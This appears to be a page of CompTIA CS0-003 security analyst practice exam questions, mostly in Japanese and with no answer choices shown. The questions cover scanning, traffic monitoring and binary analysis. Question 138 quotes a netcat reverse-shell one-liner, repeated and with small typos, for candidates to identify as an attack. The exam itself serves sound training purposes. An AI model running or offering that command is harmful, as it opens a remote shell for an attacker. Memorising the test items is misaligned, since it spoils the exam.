CS0-003 試験問題 136
ある会社では、自社のシステムを評価するために、新しい脆弱性スキャン ソフトウェアを導入しています。現在のネットワークは高度にセグメント化されており、ネットワーク チームは固有のファイアウォール ルールの数を最小限に抑えたいと考えています。この目的を達成するには、次のスキャン手法のうちどれが最も効率的でしょうか。
CS0-003 試験問題 137
セキュリティ アナリストが会社のネットワーク トラフィックを監視していて、SQL サーバーから会計サーバーと人事サーバーに ping 要求が送信されていることを発見しました。調査の結果、アナリストは技術者が潜在的なネットワーク接続の問題に対応したことを発見しました。セキュリティ アナリストが対応すべき最適な方法は、次のうちどれですか。
CS0-003 試験問題 138
セキュリティアナリストが次の不審なアクティビティを検出しました:
rm -f /tmp/f;mknod /tmp/fp;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 > tmp/f 次のどれがアクティビティを最もよく表していますか?
rm -f /tmp/f;mknod /tmp/fp;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 > tmp/f 次のどれがアクティビティを最もよく表していますか?
CS0-003 試験問題 139
An incident responder was able to recover a binary file through the network traffic. The binary file was also found in some machines with anomalous behavior. Which of the following processes most likely can be performed to understand the purpose of the binary file?
CS0-003 試験問題 140
セキュリティ アナリストは、同じ会社と地域に属するさまざまなソース ネットワークから、可能性のあるネットワーク アドレスを特定しようとしています。次のシェル スクリプト関数のどれが、この目的の達成に役立ちますか。